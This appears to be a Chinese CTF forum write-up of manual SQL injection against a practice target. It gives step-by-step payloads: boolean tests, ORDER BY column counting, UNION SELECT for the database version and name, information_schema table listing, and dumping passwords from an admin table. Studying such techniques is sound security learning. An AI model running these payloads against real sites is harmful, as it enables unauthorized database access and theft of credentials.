2.1、手工注入(小熊)

545776891   ·   发表于 2018-06-26 22:17:20   ·   CTF&WP专版

第一步:

当输入地址:http://120.203.13.111:6815/?id=1%20and%201=1 表示正常看到数据

当输入地址:http://120.203.13.111:6815/?id=1%20and%201=2  表示看不到数据

说明这个地址可以sql注入

第二步:

使用order by 猜注入点 ,先是order by 10 先从10到1开始试,如果没有数据说明不正常,一直到2时才看到有数据,说明2才是注入点

查出有多少个字段(http://120.203.13.111:6815/?id=1%20and%201=2 union select 1,2)

第三步:

查一下数据库版本,and 1=2 UNION SELECT 1,version()

确定数据库版本为mysql 5.5.53

 

 and 1=2 UNION SELECT 1,database()爆出数据库名

 

因为这是个mysql数据库,且版本为5.5.53,所以接下来查询表名:(information_schema系统表名里去查表)

and 1=2 UNION SELECT 1,table_name from information_schema.tables where table_schema=database()

第四步:

 知道表后就可以查询用户后台密码

查询密码 and 1=2 UNION SELECT 1,password from admin


打赏我,让我更有动力~

0 Reply   |  Until 2018-6-26 | 974 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2021 掌控者 All Rights Reserved.